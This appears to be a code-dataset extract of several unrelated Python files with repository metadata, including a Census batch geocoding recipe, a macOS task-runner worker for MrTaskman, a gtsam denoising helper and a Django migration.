,{'name':'matched_longitude','type':'string'}
,{'name':'matched_latitude','type':'string'}
,{'name':'matched_tigerLineId','type':'string'}
,{'name':'matched_side','type':'string'}
,{'name':'matched_state_id','type':'string'}
,{'name':'matched_county_id','type':'string'}
,{'name':'matched_tract_id','type':'string'}
,{'name':'matched_block_id','type':'string'}
,{'name':'tract_id','type':'string'}
,{'name':'block_group_id','type':'string'}
,{'name':'block_id','type':'string'}]
out_cols=[x['name'] for x in schema]
logging.info('4/6 Writing schema...')
output_dataset.write_schema(schema)
logging.info('5/6 Starting Batch...:')
batch_list_ok = []
b=-1
with output_dataset.get_writer() as writer:
for df in dataiku.Dataset(input_name).iter_dataframes(chunksize= P_BATCH_SIZE_UNIT , columns = in_cols):
b = b +1
logging.info('Processing batch: %s' % (b))
df = df[df[P_COL_STREET]<>'']
file_full_path = path_datadir_tmp + '/' + FOLDER_NAME + '/' + 'census_geocode_adresses_' + str(b) + '.csv'
df.to_csv(file_full_path,sep=',',index=None,header=None)
url = 'https://geocoding.geo.census.gov/geocoder/geographies/addressbatch?form'
payload = {'benchmark':P_BENCHMARK,'vintage':P_VINTAGE,'layers':14}
files = {'addressFile': (file_full_path, open(file_full_path, 'rb'), 'text/csv')}
try:
batch = requests.post(url, files=files, data = payload)
if batch.status_code == 200:
results = str(batch.text)
results = re.sub('"','',results)
results = results.split('\n')
for i,result in enumerate(results[:-1]):
res_parsed = results[i].split(',')
try:
idx = res_parsed.index('Match')
if idx==6:
res_parsed[1] = res_parsed[1] + res_parsed[2]
del res_parsed[2]
d=geocoder_utils.batch_geo_parse_regulars(res_parsed,out_cols)
elif idx==4:
ok4 = res_parsed[4]=='Match'
res_parsed.insert(3,'-')
d=geocoder_utils.batch_geo_parse_regulars(res_parsed,out_cols)
elif idx==5:
d=geocoder_utils.batch_geo_parse_regulars(res_parsed,out_cols)
else:
d={}
d[id_column]=res_parsed[0]
for k in out_cols[1:]:
d[k]=''
d['match']='Matched parsing required'
d['match_quality']=res_parsed
writer.write_row_dict(d)
except:
if P_KEEP_NON_MATCHING is True:
if len(res_parsed)==6:
d = pd.DataFrame([res_parsed],columns=out_cols[:6]).to_dict('record')[0]
elif len(res_parsed)==7:
res_parsed[1] = res_parsed[1] + res_parsed[2]
del res_parsed[2]
d = pd.DataFrame([res_parsed],columns=out_cols[:6]).to_dict('record')[0]
else:
d={}
d[id_column]=res_parsed[0]
for k in out_cols[1:]:
d[k]=''
d['match']='Custom parsing required'
d['match_quality']=res_parsed
writer.write_row_dict(d)
else:
logging.info("[Warning] : API returns this status: {}".format(s.status_code))
#except MaxRetryError as maxerror:
#print("Max Retries Error:", maxerror)
except requests.exceptions.HTTPError as Herr:
logging.info("Http Error:", Herr)
except requests.exceptions.ConnectionError as errc:
logging.info("Error Connecting:", errc)
except requests.exceptions.Timeout as errt:
logging.info("Timeout Error:", errt)
except requests.exceptions.RequestException as err:
logging.info("Something Else", err)
batch_list_ok.append(b)
## DEL ALL
logging.info('6/6 Dropping intermediate files...:' )
cmd = "rm -rf %s" % (path_datadir_tmp + '/' +FOLDER_NAME)
os.system(cmd)
| 35.77512 | 115 | 0.5216 | 829 | 7,477 | 4.418577 | 0.258142 | 0.056511 | 0.07644 | 0.068796 | 0.279006 | 0.176904 | 0.151515 | 0.151515 | 0.151515 | 0.151515 | 0 | 0.011247 | 0.345994 | 7,477 | 208 | 116 | 35.947115 | 0.737832 | 0.029156 | 0 | 0.19708 | 0 | 0 | 0.180262 | 0.006487 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.072993 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
35309344c14773040e0f8d93e109f4776a3d6c80 | 15,008 | py | Python | workers/macos/worker.py | joweeba/mrtaskman | cef92f11cca3de45c77b76a68a91d85af9c8fb48 | [
"Apache-2.0"
] | null | null | null | workers/macos/worker.py | joweeba/mrtaskman | cef92f11cca3de45c77b76a68a91d85af9c8fb48 | [
"Apache-2.0"
] | null | null | null | workers/macos/worker.py | joweeba/mrtaskman | cef92f11cca3de45c77b76a68a91d85af9c8fb48 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""MrTaskman worker script which executes MacOS commands."""
__author__ = 'jeff.carollo@gmail.com (Jeff Carollo)'
import cStringIO
import datetime
import httplib
import json
import logging
import os
import socket
import StringIO
import subprocess
import sys
import time
import urllib2
import gflags
from client import mrtaskman_api
from client import package_installer
from client import package_cache
from common import device_info
from common import http_file_upload
from common import parsetime
from common import split_stream
FLAGS = gflags.FLAGS
gflags.DEFINE_string('log_filename', '', 'Where to log stuff. Required.')
gflags.DEFINE_string('worker_name', '', 'Unique worker name.')
gflags.DEFINE_list('worker_capabilities', ['macos', 'android'],
'Things this worker can do.')
# Package cache flags.
gflags.DEFINE_boolean('use_cache', True, 'Whether or not to use package cache.')
gflags.DEFINE_string('cache_path',
'/usr/local/worker_cache',
'Where to cache packages.')
gflags.DEFINE_integer('min_duration_seconds', 60,
'Minimum time to cache something.')
gflags.DEFINE_integer('max_cache_size_bytes', 2 * 1024 * 1024 * 1024,
'Maximum size of the cache in bytes.')
gflags.DEFINE_float('low_watermark_percentage', 0.6,
'When cleaning up, keeps at least this much cache.')
gflags.DEFINE_float('high_watermark_percentage', 0.8,
'When cleaning up, deletes to below this line.')
class TaskError(Exception):
pass
class MrTaskmanUnrecoverableHttpError(TaskError):
pass
class MrTaskmanRecoverableHttpError(TaskError):
pass
def GetHostname():
return socket.gethostname()
class MacOsWorker(object):
"""Executes macos tasks."""
def __init__(self, worker_name, log_stream):
self.worker_name_ = worker_name
self.log_stream_ = log_stream
self.api_ = mrtaskman_api.MrTaskmanApi()
self.hostname_ = GetHostname()
self.capabilities_ = {'executor': self.GetCapabilities()}
self.executors_ = {}
for capability in self.capabilities_['executor']:
self.executors_[capability] = self.ExecuteTask
self.use_cache_ = FLAGS.use_cache
if self.use_cache_:
self.package_cache_ = package_cache.PackageCache(
FLAGS.min_duration_seconds,
FLAGS.max_cache_size_bytes,
FLAGS.cache_path,
FLAGS.low_watermark_percentage,
FLAGS.high_watermark_percentage)
def GetCapabilities(self):
capabilities = device_info.GetCapabilities()
capabilities.append('macos')
capabilities.append(self.worker_name_)
return capabilities
def AssignTask(self):
"""Makes a request to /tasks/assign to get assigned a task.
Returns:
Task if a task was assigned, or None.
"""
try:
task = self.api_.AssignTask(self.worker_name_, self.hostname_,
self.capabilities_)
return task
except urllib2.HTTPError, e:
logging.info('Got %d HTTP response from MrTaskman on AssignTask.',
e.code)
return None
except urllib2.URLError, e:
logging.info('Got URLError trying to reach MrTaskman: %s', e)
return None
def SendResponse(self, task_id, stdout, stderr, task_result):
while True:
try:
# TODO(jeff.carollo): Refactor.
device_sn = device_info.GetDeviceSerialNumber()
task_result['device_serial_number'] = device_sn
response_url = self.api_.GetTaskCompleteUrl(task_id)
if not response_url:
logging.info('No task complete url for task_id %s', task_id)
return
response_url = response_url.get('task_complete_url', None)
if not response_url:
logging.info('No task complete url for task_id %s', task_id)
return
self.api_.SendTaskResult(response_url, stdout, stderr, task_result)
logging.info('Successfully sent response for task %s: %s',
task_id, self.api_.MakeTaskUrl(task_id))
return
except urllib2.HTTPError, error_response:
body = error_response.read()
code = error_response.code
if code == 404:
logging.warning('TaskCompleteUrl timed out.')
continue
logging.warning('SendResponse HTTPError code %d\n%s',
code, body)
return
except urllib2.URLError, e:
logging.info(
'Got URLError trying to send response to MrTaskman: %s', e)
logging.info('Retrying in 10 seconds')
time.sleep(10)
continue
def GetTaskCompleteUrl(self, task_id):
try:
return self.api_.GetTaskCompleteUrl(task_id)
except urllib2.HTTPError, error_response:
body = error_response.read()
code = error_response.code
logging.warning('GetTaskCompleteUrl HTTPError code %d\n%s',
code, body)
def ShouldWaitForDevice(self):
"""Returns True iff this worker controls a device which is offline."""
if not device_info.DEVICE_SN:
return False
return not device_info.DeviceIsConnected()
def PollAndExecute(self):
logging.info('Polling for work...')
device_active = True
while True:
try:
if self.ShouldWaitForDevice():
if device_active:
logging.info('Device %s is offline. Waiting for it to come back.',
device_info.DEVICE_SN)
device_active = False
time.sleep(10)
continue
if not device_active:
logging.info('Device came back online.')
device_active = True
# TODO(jeff.carollo): Wrap this in a catch-all Excepion handler that
# allows us to continue executing in the face of various task errors.
task = self.AssignTask()
if not task:
time.sleep(10)
continue
except KeyboardInterrupt:
logging.info('Caught CTRL+C. Exiting.')
return
task_stream = cStringIO.StringIO()
task_logs = None
self.log_stream_.AddStream(task_stream)
try:
logging.info('Got a task:\n%s\n', json.dumps(task, 'utf-8', indent=2))
config = task['config']
task_id = int(task['id'])
attempt = task['attempts']
# Figure out which of our executors we can use.
executor = None
allowed_executors = config['task']['requirements']['executor']
for allowed_executor in allowed_executors:
try:
executor = self.executors_[allowed_executor]
except KeyError:
pass
if executor is not None:
break
if executor is None:
# TODO: Send error response to server.
# This is probably our fault - we said we could do something
# that we actually couldn't do.
logging.error('No matching executor from %s', allowed_executors)
raise Exception('No allowed executors matched our executors_:\n' +
'%s\nvs.%s\n' % (allowed_executors, self.executors_))
try:
# We've got a valid executor, so use it.
(results, stdout, stderr) = executor(task_id, attempt, task, config)
except MrTaskmanUnrecoverableHttpError:
logging.error(
'Unrecoverable MrTaskman HTTP error. Aborting task %d.', task_id)
continue
finally:
self.log_stream_.RemoveStream(task_stream)
task_logs = task_stream.getvalue().decode('utf-8')
task_stream.close()
try:
results['worker_log'] = task_logs.encode('utf-8')
self.SendResponse(task_id,
stdout,
stderr,
results)
except MrTaskmanUnrecoverableHttpError:
logging.error(
'Unrecoverable MrTaskman HTTP error. Aborting task %d.', task_id)
logging.info('Polling for work...')
# Loop back up and poll for the next task.
def ExecuteTask(self, task_id, attempt, task, config):
logging.info('Recieved task %s', task_id)
try:
tmpdir = package_installer.TmpDir()
# Download the files we need from the server.
files = config.get('files', [])
self.DownloadAndStageFiles(files)
# Install any packages we might need.
# TODO(jeff.carollo): Handle any exceptions raised here.
packages = config.get('packages', [])
self.DownloadAndInstallPackages(packages, tmpdir)
# We probably don't want to run forever. Default to 12 minutes.
timeout = config['task'].get('timeout', '12m')
timeout = parsetime.ParseTimeDelta(timeout)
# Get any environment variables to inject.
env = config['task'].get('env', {})
env = env.update(os.environ)
# Get our command and execute it.
command = config['task']['command']
logging.info('Running command %s', command)
(exit_code, stdout, stderr, execution_time, result_metadata) = (
self.RunCommandRedirectingStdoutAndStderrWithTimeout(
command, env, timeout, tmpdir.GetTmpDir()))
logging.info('Executed %s with result %d', command, exit_code)
results = {
'kind': 'mrtaskman#task_complete_request',
'task_id': task_id,
'attempt': attempt,
'exit_code': exit_code,
'execution_time': execution_time.total_seconds(),
'result_metadata': result_metadata
}
return (results, stdout, stderr)
finally:
tmpdir.CleanUp()
def RunCommandRedirectingStdoutAndStderrWithTimeout(
self, command, env, timeout, cwd):
command = ' '.join([command, '>stdout', '2>stderr'])
# TODO: More precise timing through process info.
begin_time = datetime.datetime.now()
timeout_time = begin_time + timeout
process = subprocess.Popen(args=command,
env=env,
shell=True,
cwd=cwd)
ret = None
while None == ret and (datetime.datetime.now() < timeout_time):
time.sleep(0.02)
ret = process.poll()
finished_time = datetime.datetime.now()
if finished_time >= timeout_time and (None == ret):
logging.info('command %s timed out.', command)
process.terminate()
process.wait()
ret = -99
execution_time = finished_time - begin_time
try:
stdout = file(os.path.join(cwd, 'stdout'), 'rb')
except IOError, e:
logging.error('stdout was not written.')
stdout = file(os.path.join(cwd, 'stdout'), 'w')
stdout.write('No stdout.')
stdout.flush()
stdout.close()
stdout = file(os.path.join(cwd, 'stdout'), 'rb')
try:
stderr = file(os.path.join(cwd, 'stderr'), 'rb')
except IOError, e:
logging.error('stderr was not written.')
stderr = file(os.path.join(cwd, 'stderr'), 'w')
stderr.write('No stderr.')
stderr.flush()
stderr.close()
stderr = file(os.path.join(cwd, 'stderr'), 'rb')
try:
result_metadata_file = file(os.path.join(cwd, 'result_metadata'), 'r')
result_metadata = json.loads(result_metadata_file.read().decode('utf-8'))
except:
result_metadata = None
return (ret, stdout, stderr, execution_time, result_metadata)
def DownloadAndStageFiles(self, files):
logging.info('Not staging files: %s', files)
# TODO: Stage files.
def DownloadAndInstallPackages(self, packages, tmpdir):
# TODO(jeff.carollo): Create a package cache if things take off.
for package in packages:
attempts = 0
while True:
try:
# TODO(jeff.carollo): Put package cache code here.
if self.use_cache_:
self.package_cache_.CopyToDirectory(
package, tmpdir.GetTmpDir(),
package_installer.DownloadAndInstallPackage)
else:
package_installer.DownloadAndInstallPackage(
package['name'], package['version'],
tmpdir.GetTmpDir())
break
except urllib2.HTTPError, e:
logging.error('Got HTTPError %d trying to grab package %s.%s: %s',
e.code, package['name'], package['version'], e)
raise MrTaskmanUnrecoverableHttpError(e)
except (urllib2.URLError, httplib.IncompleteRead,
httplib.BadStatusLine, httplib.HTTPException), e:
logging.error('Got URLError trying to grab package %s.%s: %s',
package['name'], package['version'], e)
logging.info('Retrying in 10')
attempts += 1
# TODO(jeff.carollo): Figure out a robust way to do this.
# Likely need to just try a few times to get around Internet blips
# then mark task as failed for package reasons.
if attempts < 10:
time.sleep(10)
continue
else:
logging.error('Failed to grab package for 100 attempts. Aborting.')
raise MrTaskmanUnrecoverableHttpError(e)
except IOError, e:
logging.error('Got IOError trying to grab package %s.%s: %s',
package['name'], package['version'], e)
raise MrTaskmanUnrecoverableHttpError(e)
def main(argv):
try:
argv = FLAGS(argv)
except gflags.FlagsError, e:
sys.stderr.write('%s\n' % e)
sys.exit(1)
return
# Set default socket timeout to 2 hours so that we catch missing timeouts.
socket.setdefaulttimeout(2 * 60 * 60)
if not FLAGS.log_filename:
sys.stderr.write('Flag --log_filename is required.\n')
sys.exit(-9)
return
try:
from third_party import portalocker
log_file = file(FLAGS.log_filename, 'a+')
portalocker.lock(log_file, portalocker.LOCK_EX | portalocker.LOCK_NB)
except Exception, e:
logging.exception(e)
print 'Could not get exclusive lock.'
sys.exit(-10)
return
try:
FORMAT = '%(asctime)-15s %(message)s'
log_stream = split_stream.SplitStream(sys.stdout, log_file)
logging.basicConfig(format=FORMAT, level=logging.DEBUG,
stream=log_stream)
macos_worker = MacOsWorker(FLAGS.worker_name, log_stream=log_stream)
# Run forever, executing tasks from the server when available.
macos_worker.PollAndExecute()
finally:
logging.shutdown()
log_file.flush()
portalocker.unlock(log_file)
log_file.close()
if __name__ == '__main__':
main(sys.argv)
| 34.501149 | 80 | 0.640259 | 1,775 | 15,008 | 5.287324 | 0.241127 | 0.012786 | 0.007459 | 0.010442 | 0.181779 | 0.141396 | 0.116782 | 0.09675 | 0.072882 | 0.072882 | 0 | 0.007213 | 0.260994 | 15,008 | 434 | 81 | 34.580645 | 0.838969 | 0.115005 | 0 | 0.271084 | 0 | 0 | 0.161537 | 0.009643 | 0 | 0 | 0 | 0.002304 | 0 | 0 | null | null | 0.012048 | 0.063253 | null | null | 0.003012 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
353598ee45be370c07fb9e8b962ed07021b6f3e8 | 578 | py | Python | photospicker/exception/abstract_exception.py | l-vo/photos-picker | 6790e0411bb46e3206ca778dbd83ddd1d4f90f21 | [
"MIT"
] | null | null | null | photospicker/exception/abstract_exception.py | l-vo/photos-picker | 6790e0411bb46e3206ca778dbd83ddd1d4f90f21 | [
"MIT"
] | 52 | 2018-08-31T05:57:04.000Z | 2019-02-19T15:26:40.000Z | photospicker/exception/abstract_exception.py | l-vo/photos-picker | 6790e0411bb46e3206ca778dbd83ddd1d4f90f21 | [
"MIT"
] | null | null | null | class AbstractException(Exception):
"""Abstract exception for project"""
def __init__(self, code, message):
"""
Constructor
:param int code: error code
:param str message: error message
"""
self._code = code
self._message = message
@property
def code(self):
"""
Getter code
:rtype: int
"""
return self._code
@property
def message(self): # pragma no cover
"""
Getter message
:rtype: str
"""
return self._message
| 18.645161 | 41 | 0.520761 | 54 | 578 | 5.425926 | 0.425926 | 0.081911 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.384083 | 578 | 30 | 42 | 19.266667 | 0.823034 | 0.302768 | 0 | 0.2 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.3 | false | 0 | 0 | 0 | 0.6 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
35361b12a2145f1e12f1ea888df65fc33ccd836c | 1,627 | py | Python | gtbook/linear.py | dellaert/nbdev_test | 793932be45ad75f0f1f0a03af6e4ae41e54b7857 | [
"Apache-2.0"
] | 5 | 2021-12-19T02:58:48.000Z | 2021-12-22T20:12:54.000Z | gtbook/linear.py | dellaert/nbdev_test | 793932be45ad75f0f1f0a03af6e4ae41e54b7857 | [
"Apache-2.0"
] | 2 | 2022-01-08T14:58:20.000Z | 2022-01-10T02:25:31.000Z | gtbook/linear.py | dellaert/nbdev_test | 793932be45ad75f0f1f0a03af6e4ae41e54b7857 | [
"Apache-2.0"
] | null | null | null | # AUTOGENERATED! DO NOT EDIT! File to edit: linear.ipynb (unless otherwise specified).
__all__ = ['vv', 'denoising_MRF']
# Cell
import numpy as np
import gtsam
from gtsam import noiseModel
from .display import show
from typing import Dict
# Cell
def vv(keys_vectors: Dict[int, np.ndarray]):
"""Create a VectorValues from a dict"""
result = gtsam.VectorValues()
for j, v in keys_vectors.items():
result.insert(j, v)
return result
# Cell
def denoising_MRF(M: int, N: int, sigma = 0.5, smoothness_sigma=0.5):
"""Create MxN MRF
@returns graph and symbols used for rows.
"""
row_symbols = [chr(ord('a')+row) for row in range(M)]
keys = {(row, col): gtsam.symbol(row_symbols[row], col+1)
for row in range(M) for col in range(N)}
rng = np.random.default_rng(42)
data = rng.normal(loc=0, scale=sigma, size=(M, N, 1))
data_model = noiseModel.Isotropic.Sigmas([sigma])
smoothness_model = noiseModel.Isotropic.Sigmas([smoothness_sigma])
I = np.eye(1, 1, dtype=float)
zero = np.zeros((1, 1))
graph = gtsam.GaussianFactorGraph()
for row in range(M):
for col in range(N):
# add data terms:
j = keys[(row, col)]
graph.add(j, I, np.array(data[row, col]), data_model)
# add smoothness terms:
if col > 0:
j1 = keys[(row, col-1)]
graph.add(j, I, j1, -I, zero, smoothness_model)
if row > 0:
j2 = keys[(row-1, col)]
graph.add(j, I, j2, -I, zero, smoothness_model)
return graph, row_symbols
# Cell
| 29.053571 | 86 | 0.598648 | 237 | 1,627 | 4.029536 | 0.371308 | 0.036649 | 0.025131 | 0.040838 | 0.100524 | 0.058639 | 0.058639 | 0.058639 | 0.058639 | 0.058639 | 0 | 0.017692 | 0.270436 | 1,627 | 55 | 87 | 29.581818 | 0.786858 | 0.143823 | 0 | 0 | 1 | 0 | 0.011747 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.060606 | false | 0 | 0.151515 | 0 | 0.272727 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
3539dc514be01a0a70e432b9eaf2771e8b35648e | 899 | py | Python | _0697_div3/D_Cleaning_the_Phone.py | mingweihe/codeforces | 8395d68a09373775009b76dbde189ce5bbba58ae | [
"MIT"
] | null | null | null | _0697_div3/D_Cleaning_the_Phone.py | mingweihe/codeforces | 8395d68a09373775009b76dbde189ce5bbba58ae | [
"MIT"
] | null | null | null | _0697_div3/D_Cleaning_the_Phone.py | mingweihe/codeforces | 8395d68a09373775009b76dbde189ce5bbba58ae | [
"MIT"
] | null | null | null | def solve(n, m, A, B):
ans = 0
ones, twos = [], []
for i in xrange(n):
if B[i] == 1: ones += A[i],
else: twos += A[i],
ones.sort()
twos.sort()
i, j = len(ones)-1, len(twos)-1
while m > 0 and (i >= 0 or j >= 0):
if i >= 0 and ones[i] >= m:
m -= ones[i]
ans += 1
break
mem1, mem2 = float('-inf'), float('-inf')
if i == 0: mem1 = ones[i]
elif i > 0: mem1 = ones[i] + ones[i-1]
if j >= 0: mem2 = twos[j]
if mem1 >= mem2:
m -= ones[i]
i -= 1
ans += 1
else:
m -= mem2
j -= 1
ans += 2
return -1 if m > 0 else ans
for _ in xrange(int(raw_input())):
n, m = map(int, raw_input().split())
A = map(int, raw_input().split())
B = map(int, raw_input().split())
print solve(n, m, A, B)
| 26.441176 | 49 | 0.404894 | 142 | 899 | 2.528169 | 0.260563 | 0.083565 | 0.122563 | 0.116992 | 0.270195 | 0 | 0 | 0 | 0 | 0 | 0 | 0.051233 | 0.413793 | 899 | 33 | 50 | 27.242424 | 0.629981 | 0 | 0 | 0.125 | 0 | 0 | 0.008899 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.03125 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
354187da39692ce916dbf65d6fc9ecbdceb76905 | 239 | py | Python | pythonScript.py | qinenergy/QinBox | 9047d1fc6b7f1796820f13aabc1d7fe20cf8f34d | [
"MIT"
] | null | null | null | pythonScript.py | qinenergy/QinBox | 9047d1fc6b7f1796820f13aabc1d7fe20cf8f34d | [
"MIT"
] | null | null | null | pythonScript.py | qinenergy/QinBox | 9047d1fc6b7f1796820f13aabc1d7fe20cf8f34d | [
"MIT"
] | null | null | null | """
Lite install NLTK resource
"""
import nltk
dler = nltk.downloader.Downloader()
dler._update_index()
dler._status_cache['panlex_lite'] = 'installed' # Trick the index to treat panlex_lite as it's already installed.
dler.download('all')
| 26.555556 | 113 | 0.761506 | 34 | 239 | 5.176471 | 0.676471 | 0.113636 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.112971 | 239 | 8 | 114 | 29.875 | 0.830189 | 0.380753 | 0 | 0 | 0 | 0 | 0.164286 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.2 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
3544ad58108f77d2815d664fdbba023d8958f9ac | 354 | py | Python | opticmedian/utils/file_reader.py | QuicqDev/OpticRescue | f857e3b770f43958f1d687f164ea896aa5390482 | [
"MIT"
] | 2 | 2021-08-09T01:35:06.000Z | 2021-08-09T01:37:05.000Z | opticmedian/utils/file_reader.py | QuicqDev/OpticRescue | f857e3b770f43958f1d687f164ea896aa5390482 | [
"MIT"
] | 8 | 2021-08-07T15:27:48.000Z | 2021-09-05T18:24:29.000Z | opticmedian/utils/file_reader.py | ASH1998/OpticRescue | f857e3b770f43958f1d687f164ea896aa5390482 | [
"MIT"
] | 1 | 2021-08-09T01:37:23.000Z | 2021-08-09T01:37:23.000Z | """
class to read files in specific ways
"""
import glob
import random
class Filer:
"""
read files
"""
def __init__(self, file_path):
self.path = file_path
def get_random_iter(self):
"""
get file contents in random
"""
nb_files = sum(1 for _ in glob.iglob(self.path))
file_iter = glob.glob(self.path)
return file_iter, nb_files
| 13.615385 | 50 | 0.677966 | 55 | 354 | 4.127273 | 0.454545 | 0.105727 | 0.105727 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003559 | 0.206215 | 354 | 25 | 51 | 14.16 | 0.80427 | 0.211864 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.222222 | false | 0 | 0.222222 | 0 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
35468d2fd3afa4235fa24ef45b8d2a4fc954d35d | 891 | py | Python | WeatherStationSensorsReader/controllers/wind_measurement_controller.py | weather-station-project/weather-station-sensors-reader | cda7902ee382248b41d14b9a2c0543817decbb4a | [
"MIT"
] | null | null | null | WeatherStationSensorsReader/controllers/wind_measurement_controller.py | weather-station-project/weather-station-sensors-reader | cda7902ee382248b41d14b9a2c0543817decbb4a | [
"MIT"
] | null | null | null | WeatherStationSensorsReader/controllers/wind_measurement_controller.py | weather-station-project/weather-station-sensors-reader | cda7902ee382248b41d14b9a2c0543817decbb4a | [
"MIT"
] | null | null | null | from controllers.controller import Controller
from dao.wind_measurement_dao import WindMeasurementDao
from sensors.wind_measurement_sensor import WindMeasurementSensor
class WindMeasurementController(Controller):
""" Represents the controller with the wind measurement sensor and DAO """
def __init__(self, anemometer_port_number, server, database, user, password):
super(WindMeasurementController, self).__init__(sensor=WindMeasurementSensor(anemometer_port_number=anemometer_port_number),
dao=WindMeasurementDao(server=server,
database=database,
user=user,
password=password))
| 59.4 | 132 | 0.560045 | 64 | 891 | 7.515625 | 0.4375 | 0.093555 | 0.12474 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.393939 | 891 | 14 | 133 | 63.642857 | 0.890741 | 0.074074 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0.2 | 0.3 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
3547f355d42e86cac54a2fa19887cfc08f3e0eb5 | 984 | py | Python | dashboard/migrations/0005_usercacherefreshtime.py | Wassaf-Shahzad/micromasters | b1340a8c233499b1d8d22872a6bc1fe7f49fd323 | [
"BSD-3-Clause"
] | 32 | 2016-03-25T01:03:13.000Z | 2022-01-15T19:35:42.000Z | dashboard/migrations/0005_usercacherefreshtime.py | Wassaf-Shahzad/micromasters | b1340a8c233499b1d8d22872a6bc1fe7f49fd323 | [
"BSD-3-Clause"
] | 4,858 | 2016-03-03T13:48:30.000Z | 2022-03-29T22:09:51.000Z | dashboard/migrations/0005_usercacherefreshtime.py | umarmughal824/micromasters | ea92d3bcea9be4601150fc497302ddacc1161622 | [
"BSD-3-Clause"
] | 20 | 2016-08-18T22:07:44.000Z | 2021-11-15T13:35:35.000Z | # -*- coding: utf-8 -*-
# Generated by Django 1.9.10 on 2016-11-04 21:12
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('dashboard', '0004_switch_jsonfield'),
]
operations = [
migrations.CreateModel(
name='UserCacheRefreshTime',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('enrollment', models.DateTimeField(null=True)),
('certificate', models.DateTimeField(null=True)),
('current_grade', models.DateTimeField(null=True)),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
| 33.931034 | 118 | 0.644309 | 103 | 984 | 5.990291 | 0.61165 | 0.038898 | 0.111831 | 0.13128 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.027815 | 0.232724 | 984 | 28 | 119 | 35.142857 | 0.789404 | 0.069106 | 0 | 0 | 1 | 0 | 0.100767 | 0.023001 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.190476 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
